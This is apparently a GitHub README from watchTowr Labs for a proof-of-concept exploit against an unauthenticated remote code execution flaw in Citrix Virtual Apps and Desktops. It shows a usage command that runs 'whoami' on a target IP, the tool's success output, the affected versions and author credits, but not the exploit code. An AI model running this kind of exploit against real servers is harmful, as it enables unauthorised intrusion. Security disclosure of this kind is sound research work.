
Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCE
Citrix Virtual Apps and Desktops (XEN) Unauthenticated Remote Code Execution Vulnerability
Check out our blog post for detailed technical information.
https://github.com/user-attachments/assets/563fd110-5321-49f7-8dc3-48eb0a53e0f9
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
CVE-xxxx-xxxxx.py
(*) Citrix Virtual Apps and Desktops Unauthenticated Remote Code Execution (CVE-xxxx-xxxxx) Exploit by watchTowr
CVE: [CVE-xxxx-xxxxx]
[INFO] Command successfully sent to 192.168.1.120!
Citrix Virtual Apps and Desktops 7 2402 LTSR and all prior versions are affected by this vulnerability. For more details, refer to the Citrix official advisory.
This exploit tool was written by Sina Kheirkhah (@SinSinology) from watchTowr (@watchtowrcyber).
For the latest security research updates, follow the watchTowr Labs team: